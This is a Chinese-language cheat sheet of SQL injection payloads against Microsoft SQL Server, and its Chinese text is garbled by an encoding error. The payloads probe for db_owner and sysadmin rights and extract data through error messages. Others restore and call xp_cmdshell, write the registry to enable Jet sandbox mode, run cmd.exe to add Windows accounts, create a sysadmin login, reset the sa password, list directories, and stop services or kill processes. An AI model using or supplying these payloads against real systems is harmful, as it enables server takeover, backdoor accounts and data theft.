//看看是什么權(quán)限的

    and 1=(Select IS_MEMBER('db_owner'))

    And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--

    //檢測(cè)是否有讀取某數(shù)據(jù)庫(kù)的權(quán)限

    and 1= (Select HAS_DBACCESS('master'))

    And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --

    數(shù)字類(lèi)型

    and char(124)%2Buser%2Bchar(124)=0

    字符類(lèi)型

    ' and char(124)%2Buser%2Bchar(124)=0 and ''='

    搜索類(lèi)型

    ' and char(124)%2Buser%2Bchar(124)=0 and '%'='

    爆用戶(hù)名

    and user>0

    ' and user>0 and ''='

    檢測(cè)是否為SA權(quán)限

    and 1=(select IS_SRVROLEMEMBER('sysadmin'));--

    And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --

    檢測(cè)是不是MSSQL數(shù)據(jù)庫(kù)

    and exists (select * from sysobjects);--

    檢測(cè)是否支持多行

    ;declare @d int;--

    恢復(fù) xp_cmdshell

    ;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--

    select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')

    //-----------------------

    //     執(zhí)行命令

    //-----------------------

    首先開(kāi)啟沙盤(pán)模式：

    exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

    然后利用jet.oledb執(zhí)行系統(tǒng)命令

    select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')

    執(zhí)行命令

    ;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--

    EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'

    判斷xp_cmdshell擴(kuò)展存儲(chǔ)過(guò)程是否存在：

    http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')

    寫(xiě)注冊(cè)表

    exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

    REG_SZ

    讀注冊(cè)表

    exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'

    讀取目錄內(nèi)容

    exec master..xp_dirtree 'c:\winnt\system32\',1,1

    數(shù)據(jù)庫(kù)備份

    backup database pubs to disk = 'c:\123.bak'

    //爆出長(zhǎng)度

    And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--

    更改sa口令方法：用sql綜合利用工具連接后，執(zhí)行命令：

    exec sp_password NULL,'新密碼','sa'

    添加和刪除一個(gè)SA權(quán)限的用戶(hù)test：

    exec master.dbo.sp_addlogin test,ptlove

    exec master.dbo.sp_addsrvrolemember test,sysadmin

    刪除擴(kuò)展存儲(chǔ)過(guò)過(guò)程xp_cmdshell的語(yǔ)句:

    exec sp_dropextendedproc 'xp_cmdshell'

    添加擴(kuò)展存儲(chǔ)過(guò)過(guò)程

    EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'

    GRANT exec On xp_proxiedadata TO public

    停掉或激活某個(gè)服務(wù)，

常備的注入命令總結(jié)

電腦資料

    exec master..xp_servicecontrol 'stop','schedule'

    exec master..xp_servicecontrol 'start','schedule'

    dbo.xp_subdirs

    只列某個(gè)目錄下的子目錄。

    xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'

    dbo.xp_makecab

    將目標(biāo)多個(gè)檔案壓縮到某個(gè)目標(biāo)檔案之內(nèi)。

    所有要壓縮的檔案都可以接在參數(shù)列的最后方，以逗號(hào)隔開(kāi)。

    dbo.xp_makecab

    'c:\test.cab','mszip',1,

    'C:\Inetpub\wwwroot\SQLInject\login.asp',

    'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'

    xp_terminate_process

    停掉某個(gè)執(zhí)行中的程序，但賦予的參數(shù)是 Process ID。